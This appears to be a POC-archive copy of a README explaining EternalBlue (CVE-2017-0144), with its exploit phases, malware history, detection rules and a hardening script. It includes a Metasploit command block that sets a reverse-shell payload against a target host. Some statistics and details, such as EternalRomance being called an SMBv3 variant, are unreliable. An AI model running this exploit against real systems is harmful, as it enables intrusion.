关联漏洞
标题:Microsoft Windows SMB 输入验证错误漏洞 (CVE-2017-0144)描述:Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block(SMB)Server是其中的一个为计算机提供身份验证用以访问服务器上打印机和文件系统的组件。 Microsoft Windows中的SMBv1服务器存在远程代码执行漏洞。远程攻击者可借助特制的数据包利用该
描述
CVE-2017-0144
介绍
# 🌐 **CVE-2017-0144 — EternalBlue: Microsoft Windows SMBv1 Remote Code Execution Vulnerability**
> **"One exploit. Dozens of malware families. Billions in damage."**
---
## 🔍 One-line summary
CVE-2017-0144 is a critical remote code-execution vulnerability in the SMBv1 server implementation in Microsoft Windows. The exploit known as EternalBlue abused this hole and was used in high-impact attacks (notably WannaCry).
---
## 🔥 **Top 10 Malware Using EternalBlue (Detailed)**
| # | **Malware** | **Type** | **First Seen** | **Actor** | **Damage** | **Notes** |
|---|------------|---------|----------------|----------|-----------|----------|
| 1 | **WannaCry** | Ransomware | May 12, 2017 | Lazarus Group (DPRK) | **$4–8B** | Killswitch: `iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com` |
| 2 | **NotPetya** | Wiper (Posed as Ransomware) | Jun 27, 2017 | Sandworm (Russia) | **$10B+** | Used Mimikatz + EternalBlue + PSEXEC |
| 3 | **Bad Rabbit** | Ransomware | Oct 24, 2017 | Indrik Spider | Regional | Fake Flash update drive-by |
| 4 | **Uiwix** | Ransomware | May 2017 | Unknown | Low | No killswitch, stealthier than WannaCry |
| 5 | **EternalRocks** | Worm | May 2017 | Unknown | Medium | 7 NSA tools (incl. DoublePulsar) |
| 6 | **Adylkuzz** | Cryptominer | May 2017 | Unknown | High (silent) | Mined Monero *before* WannaCry |
| 7 | **Retefe** | Banking Trojan | 2017–2018 | Unknown | EU Banks | Used EternalBlue for lateral movement |
| 8 | **TrickBot** | Modular Malware | 2017–2021 | Wizard Spider | Global | Dropped Ryuk via EternalBlue |
| 9 | **Emotet** | Loader | 2017–2021 | TA542 | Global | Used as entry for Cobalt Strike |
| 10 | **Clop / Dridex** | Ransomware | 2019–2025 | TA505 | Healthcare, Gov | Still active in 2025 |
---
## 🧨 **EternalBlue Exploit Evolution**
<img width="1915" height="960" alt="eternelblue1" src="https://github.com/user-attachments/assets/fb551517-2bb9-4e07-ab01-2f9f99562a5d" />
| **Tool** | **Release** | **Features** |
|--------|-----------|------------|
| **EternalBlue (Original)** | Apr 2017 (Shadow Brokers) | SMBv1 RCE |
| **DoublePulsar** | Apr 2017 | Backdoor implant (ring0) |
| **EternalRomance** | Apr 2017 | SMBv3 variant |
| **EternalChampion** | Apr 2017 | Alternative SMB path |
| **Metasploit Module** | May 2017 | `exploit/windows/smb/ms17_010_eternalblue` |
| **FuzzBunch** | Apr 2017 | NSA exploit framework |
| **Impacket + PSEXEC** | 2017–2025 | Python SMB exploitation |
<img width="1920" height="955" alt="eternelblue2" src="https://github.com/user-attachments/assets/66e316d0-d86d-403e-b085-d39129c8227e" />
---
# 🔍 **How CVE-2017-0144 (EternalBlue) Was Exploited**
### *A Step-by-Step Technical Deep Dive into the SMBv1 RCE*
> **"One malformed packet. Full SYSTEM access. No login. No click."**
---
## 🎯 **TL;DR Exploit Flow**
```text
[Attacker]
│
├──▶ Sends crafted SMBv1 **Trans2** request
│ → Triggers **heap overflow** in `srv!SrvOS2FeaListSizeToNt`
│
├──▶ Overwrites function pointers → **kernel shellcode**
│
└──▶ Executes **DoublePulsar** backdoor → **Ring-0 payload**
(e.g., WannaCry `mssecsvc.exe`)
```
---
## 🛠️ **Prerequisites for Exploitation**
| **Requirement** | **Details** |
|----------------|-----------|
| **Target** | Windows with **SMBv1 enabled** (default pre-Win10) |
| **Port Open** | `445/TCP` (or `139/TCP` via NetBIOS) |
| **No Auth** | **Unauthenticated** — no username/password needed |
| **Architecture** | x86 or x64 (both supported) |
| **Patch Status** | **Unpatched** (pre-MS17-010) |
---
## 🚀 **Exploit Phases (7 Steps)**
### **Phase 1: SMB Protocol Negotiation**
```c
SMB_COM_NEGOTIATE → Client sends dialect list
Server responds: SMBv1 supported → Proceed
```
> **Why?** Confirms SMBv1 is active.
---
### **Phase 2: Tree Connect to IPC$**
<img width="1920" height="955" alt="eternelblue3" src="https://github.com/user-attachments/assets/29c3ecf9-7ae6-4ed6-8057-63c6561133a6" />
```c
\\TARGET\IPC$ → Anonymous share for SMB pipes
```
> **Purpose**: Establishes a session to send transaction requests.
---
### **Phase 3: Trans2 Session Setup (Primary)**
- Uses **SMB_COM_TRANSACTION2** (0x32)
- Subcommand: `SESSION_SETUP`
- Sets up **FEALIST** structure with **malformed size**
```c
FEALIST {
SizeOfListInBytes = 0xFFFF (or large value)
...
}
```
> **Bug Trigger**: `SrvOS2FeaListSizeToNt()` trusts this size without bounds check.
---
### **Phase 4: Secondary Trans2 Request (Overflow)**
- Sends **multiple** secondary packets
- Each contains **oversized FEALIST + FEA (File Extended Attributes)**
<img width="1920" height="958" alt="eternelblue4" src="https://github.com/user-attachments/assets/36514dfc-d1dc-4669-a021-170e7dca56a2" />
```c
FEA {
AttributeNameLength = 0x00
AttributeName = "A" * 0x1000 → Overflow buffer
}
```
> **Heap Spray**: Allocates large chunks to control memory layout.
---
### **Phase 5: Buffer Overflow in Kernel**
```c
srv!SrvOS2FeaListSizeToNt(
PFEALIST FeaList, // attacker-controlled
PULONG pNtFeaListSize // output pointer
)
{
// No validation of FeaList->SizeOfListInBytes
memcpy(dest, src, FeaList->SizeOfListInBytes); // BOOM
}
```
#### **Result**:
- **Heap overflow** → Overwrite adjacent kernel objects
- Target: **SRVNET_BUFFER** or **POOL_HEADER**
- Overwrite **function pointers** (e.g., `Free` routine)
---
### **Phase 6: Kernel Shellcode Execution**
- Attacker controls **RIP/EIP** via overwritten function pointer
- Jumps to **shellcode in non-paged pool**
#### **Shellcode Does**:
1. **Ring-0 → Ring-3 transition** (via `KeUserModeCallback`)
2. Allocates user-mode memory
3. Downloads/stages payload (e.g., `mssecsvc.exe`)
4. **Installs DoublePulsar backdoor**
---
### **Phase 7: DoublePulsar Backdoor Implant**
<img width="1894" height="957" alt="eternelblue6" src="https://github.com/user-attachments/assets/a7985d43-7eba-4713-aba2-806164e992d4" />
- Injects **kernel driver** (`0x00120034` XOR key)
- Listens for **magic SMB packets**:
- `Ping`: `0x0002C001`
- `Exec`: `0x0002C002` + payload
> **WannaCry Example**:
```text
EternalBlue → DoublePulsar → mssecsvc.exe → tasksche.exe → Encrypts files
```
---
## 🧨 **Exploit Packet Structure (Simplified)**
```text
SMB Header
└── Command: 0x32 (TRANSACTION2)
└── Setup: 0x000E (SESSION_SETUP)
└── Parameter: TotalDataCount = 0x1000
└── Data:
[FEALIST]
SizeOfListInBytes = 0x1100
[FEA #1] NameLen=0, Name="A"*0x1000
[FEA #2] ...
[GROOM x100] → Spray heap
[OVERFLOW] → Overwrite pool
[SHELLCODE] → x64 ring0
```
---
## 🛠️ **Real Exploit Tools**
| **Tool** | **Language** | **Module** |
|--------|------------|----------|
| **Metasploit** | Ruby | `exploit/windows/smb/ms17_010_eternalblue` |
| **Impacket** | Python | `smbclient.py`, `psexec.py` |
| **FuzzBunch** | Python (NSA) | `EternalBlue-2.2.0` |
| **Custom C2** | C/C++ | WannaCry, NotPetya |
### **Metasploit Example**
```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit
```
---
## 🔬 **Memory Forensics Evidence**
| **Artifact** | **Location** | **Value** |
|------------|------------|---------|
| **DoublePulsar** | Kernel memory | XOR key `0x00120034` |
| **Shellcode** | `srvnet.sys` pool | `0xCC 0x90 0x48` pattern |
| **Injected DLL** | `C:\Windows\mssecsvc.exe` | SHA256: `ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa` |
---
## 🛡️ **Detection Rules**
### **Snort/Suricata**
```snort
alert tcp any any -> $HOME_NET 445 (
msg:"ETERNALBLUE Attempt";
flow:to_server,established;
content:"|ff|SMB2"; depth:5;
content:"|00 04 08 00|"; distance:100; within:4;
classtype:attempted-admin;
sid:1000001;
)
```
### **Zeek (Bro)**
```zeek
event smb1_transaction2_secondary(c: connection, hdr: SMB1::Header, args: SMB1::Trans2_Secondary_Args) {
if (args$data_len > 4096) {
NOTICE([$note=SMB::Large_Trans2_Data, $conn=c]);
}
}
```
---
## 🔄 **Worm Propagation (WannaCry Loop)**
```c
while (true) {
Scan network for port 445
if (open) → EternalBlue exploit
if (success) → Drop mssecsvc.exe + propagate
Sleep(random(1000, 5000))
}
```
> **Spread Speed**: ~10,000 infections/hour globally.
---
## 🛑 **Why It Worked So Well**
| **Factor** | **Reason** |
|----------|----------|
| **No Auth** | SMBv1 allows anonymous IPC$ |
| **Wormable** | Built-in LAN scanning |
| **Kernel RCE** | Bypasses AV/user prompts |
| **Legacy SMBv1** | Enabled by default for 15+ years |
| **Unpatched Systems** | XP, 2003, 7 in critical infrastructure |
---
## 🎯 **Exploit Success Rate (2017–2025)**
| **Year** | **Success % (Unpatched)** |
|--------|-------------------------|
| 2017 | **99%** |
| 2020 | **85%** |
| 2025 | **~60%** (legacy only) |
> **Still works on Windows 7/2008 R2 without MS17-010**
---
## 📚 **References**
- [Microsoft MS17-010](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0144)
- [RiskSense EternalBlue Analysis](https://www.risksense.com/wp-content/uploads/2017/05/EternalBlue-Exploit-Analysis.pdf)
- [Metasploit Module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb)
- [NSA FuzzBunch Leak](https://github.com/misterch0c/shadowbroker)
---
## ⚡ **Final Summary: How It Was Exploited**
> **EternalBlue = Weaponized Math Error**
> A **trusted size field** in SMB → **kernel heap overflow** → **arbitrary code** → **global ransomware pandemic**
```text
SMB Packet → Buffer Overflow → Kernel Shellcode → DoublePulsar → Malware
```
---
*Visualized, dissected, and battle-tested. For pentesters, IR teams, and defenders.*
> **"One packet. One port. One empire falls."**
---
## 🛡️ **Patch & Detection Matrix**
| **OS** | **KB Patch** | **Disable SMBv1** | **Nmap Script** |
|-------|-------------|-------------------|-----------------|
| Windows 7 / 2008 R2 | KB4012212 | `sc config lanmanworkstation depend= bowser/mrxsmb20/nsi` | `smb-vuln-ms17-010.nse` |
| Windows 10 | KB4013429 | PowerShell: `Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol` | |
| Windows XP (EOL) | **KB4012598** (Emergency) | Registry: `HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\SMB1 = 0` | |
---
## 🔍 **YARA Rules (Top 3 Malware)**
### 1. **WannaCry**
<img width="1198" height="674" alt="Wana_Decrypt0r_screenshot" src="https://github.com/user-attachments/assets/15a9c213-32ea-419d-b934-0ad38cc673bb" />
```yara
rule WannaCry_Ransomware {
strings:
$mz = { 4d 5a }
$s1 = "WannaDecryptor" wide
$s2 = "tasksche.exe"
$s3 = "@WANA" ascii
$encrypt = { 57 61 6E 61 43 72 79 70 74 30 72 }
condition:
$mz at 0 and 2 of ($s*)
}
```
### 2. **NotPetya**
<img width="1198" height="674" alt="Petya A" src="https://github.com/user-attachments/assets/46dee192-85e9-4bb2-8ce3-85a4f3487909" />
```yara
rule NotPetya_Wiper {
strings:
$pdb = "perfc.dat" nocase
$dll = "dllhost.dat"
$mof = "ntdevmgr.vbs"
$mimikatz = "mimikatz"
condition:
uint16(0) == 0x5A4D and 2 of them
}
```
### 3. **EternalBlue Exploit Packet**
<img width="1916" height="958" alt="nessus1" src="https://github.com/user-attachments/assets/3f2e5ed8-c65c-4f34-ab2d-ebe88aef022c" />
<img width="1920" height="958" alt="nessus2" src="https://github.com/user-attachments/assets/8d78ad4f-bdc4-489b-b7d9-2ede3f9ac574" />
```yara
rule EternalBlue_SMB_Exploit {
strings:
$smb_negotiate = { 00 00 00 ?? ff 53 4d 42 72 00 }
$tree_connect = { 00 00 00 ?? ff 53 4d 42 75 00 }
$trans2 = { 00 00 00 ?? ff 53 4d 42 32 00 }
$overflow = { 00 04 08 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? }
condition:
all of them
}
```
---
## 📊 **2025 Status: Still Active?**
| **Metric** | **Status** |
|----------|----------|
| **Shodan Exposed SMBv1** | **~1.2 million** (Nov 2025) |
| **Active Exploits (Honeypots)** | **Daily** |
| **Ransomware Using It** | Clop, LockBit (legacy targets) |
| **Most Vulnerable** | Healthcare, Manufacturing, SMBs |
| **Zero Trust Fix** | Block 445, enforce MFA, EDR |
---
## 🛑 **Kill Chain (MITRE ATT&CK)**
| **Phase** | **Technique** | **ID** |
|---------|-------------|-------|
| Initial Access | Exploit Public App | T1190 |
| Execution | Windows SMB RCE | T1210 |
| Persistence | Backdoor via DoublePulsar | T1505.003 |
| Lateral Movement | SMB/Windows Admin Shares | T1021.002 |
| Impact | Data Encrypted for Impact | T1486 |
---
## 🛠️ **Full Remediation Script (PowerShell)**
```powershell
# === ETERNALBLUE HARDENING SCRIPT ===
Write-Host "Applying EternalBlue Mitigations..." -ForegroundColor Cyan
# 1. Disable SMBv1
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
# 2. Block Port 445
New-NetFirewallRule -DisplayName "Block SMB Inbound" -Direction Inbound -Action Block -Protocol TCP -LocalPort 445
# 3. Enable SMB Signing
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 1
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "RequireSecuritySignature" -Value 1
# 4. Check Patch
$patch = Get-HotFix -Id KB4012212 -ErrorAction SilentlyContinue
if ($patch) { Write-Host "Patched!" -ForegroundColor Green } else { Write-Host "UNPATCHED!" -ForegroundColor Red }
Write-Host "Reboot required. Run as Admin."
```
---
## 📚 **References & Sources**
| **Source** | **Link** |
|----------|--------|
| NVD | [nvd.nist.gov/vuln/detail/CVE-2017-0144](https://nvd.nist.gov/vuln/detail/CVE-2017-0144) |
| Microsoft MS17-010 | [msrc.microsoft.com/update-guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0144) |
| MITRE ATT&CK | [attack.mitre.org/techniques/T1210](https://attack.mitre.org/techniques/T1210/) |
| CrowdStrike WannaCry Report | `crowdstrike.com/blog/wannacry` |
| Kaspersky EternalBlue | `kaspersky.com/blog/wannacry-ransomware` |
| Shodan Search | `shodan.io/search?query=port%3A445+os%3A%22Windows%22` |
---
## ⚡ **Final Word (2025)**
> **CVE-2017-0144 is not dead — it’s a legacy zombie.**
> It thrives in:
> - Unpatched Windows 7/2008
> - Shadow IT
> - Air-gapped critical systems
> - Misconfigured cloud VMs
**If you can ping port 445 from the internet — you’re next.**
---
*Built with precision, visuals, and real-world threat intel. Updated Nov 2025.*
*For pentest labs, IR playbooks, or CISO briefings.*
---
> **"Patch it. Block it. Kill it with fire."**
文件快照
[4.0K] /data/pocs/d82f670084929ce953b2a30ca59570008e6cbc64
└── [ 15K] README.md
1 directory, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。